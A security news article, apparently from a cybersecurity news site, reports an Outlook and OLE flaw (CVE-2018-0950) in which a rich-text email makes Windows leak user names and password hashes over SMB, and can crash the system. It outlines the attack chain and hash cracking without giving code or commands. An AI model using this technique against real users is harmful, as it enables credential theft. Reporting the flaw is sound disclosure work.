Tuesday, February 18, 2025
HomePassword AttacksHackers Can Steal Password Hashes & Crash Windows systems Automatically with Microsoft...

Hackers Can Steal Password Hashes & Crash Windows systems Automatically with Microsoft Outlook and OLE

Published on

SIEM as a Service

Follow Us on Google News

The researcher discovered a flaw that combined with Microsoft Outlook and OLE which leads to steal the Password hash and eventually crash the windows system.

OLE (Object Linking and Embedding) is a component document technology created by Microsoft that helps to dynamically link files and applications together.

Microsoft Outlook is an email client that comes with Microsoft Office. Outlook includes the ability to send rich text (RTF) email messages.

We can see the rich text Email messages when we open it with Microsoft outlook client.

HTML Email messages are a common rich text file and when we open it with Microsoft outlook client it will not load automatically since it belongs to HTML message that has a remote image on a web server.

Because it could leak the client system’s IP address and other metadata such as the time that an email is viewed if Outlook allowed remote images to load automatically.

But same remote Image retrieved by SMB server via RTF Email message and OLE Document has been loaded and rendered the images successfully.

According to Researcher, this is unexpected. Outlook blocks remote web content due to the privacy risk of web bugs. But with a rich text email, the OLE object is loaded with no user interaction.

Traffic Capture and Stealing Password Hash

We analyse the web traffic when the document loading after it being shared remotely and to see what kind of information it leaks.

“Here we can see that an SMB connection is being automatically negotiated. The only action that triggers this negotiation is Outlook previewing an email that is sent to it.”

In this case researcher find that following data are leaked due to OLE Web Bug:

  1. IP address
  2. Domain name
  3. User name
  4. Host name
  5. SMB session key

Aslo this outlook bug initiates an SMB(Server Message Block) connection to an arbitrary host. An SMB flaw that has been disclosed on February 1, 2017

Upon connecting to a malicious SMB server, Windows would crash, in this case, user create a rich text email in Outlook, but point to an SMB server that exploits this vulnerability.

Later hash will be cracked using a tool called John the Ripper, and it reveals the password for the user “test_user”.

it was reported to Microsoft and released a fix for the issue of Outlook automatically loading remote OLE content (CVE-2018-0950).

Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Latest articles

Highly Obfuscated .NET sectopRAT Mimic as Chrome Extension

SectopRAT, also known as Arechclient2, is a sophisticated Remote Access Trojan (RAT) developed using...

Threat Actors Trojanize Popular Games to Evade Security and Infect Systems

A sophisticated malware campaign was launched by cybercriminals, targeting users through trojanized versions of...

New Research Aims to Strengthen MITRE ATT&CK for Evolving Cyber Threats

A recent study by researchers from the National University of Singapore and NCS Cyber...

New LLM Vulnerability Exposes AI Models Like ChatGPT to Exploitation

A significant vulnerability has been identified in large language models (LLMs) such as ChatGPT,...

Supply Chain Attack Prevention

Free Webinar - Supply Chain Attack Prevention

Recent attacks like Polyfill[.]io show how compromised third-party components become backdoors for hackers. PCI DSS 4.0’s Requirement 6.4.3 mandates stricter browser script controls, while Requirement 12.8 focuses on securing third-party providers.

Join Vivekanand Gopalan (VP of Products – Indusface) and Phani Deepak Akella (VP of Marketing – Indusface) as they break down these compliance requirements and share strategies to protect your applications from supply chain attacks.

Discussion points

Meeting PCI DSS 4.0 mandates.
Blocking malicious components and unauthorized JavaScript execution.
PIdentifying attack surfaces from third-party dependencies.
Preventing man-in-the-browser attacks with proactive monitoring.

More like this

Chinese Hackers Attacking Microsoft Customers With Sophisticated Password Spray Attacks

Researchers have identified a network of compromised devices, CovertNetwork-1658, used by Chinese threat actors...

PoC Exploit Released for QNAP QTS zero-day RCE Flaw

Researchers have shown a proof-of-concept (PoC) attack for a zero-day remote code execution (RCE)...

PoC Exploit Published for 0-day Vulnerability in Google Chrome

A proof-of-concept (PoC) exploit for a critical zero-day vulnerability (CVE-2024-4947) in Google Chrome has...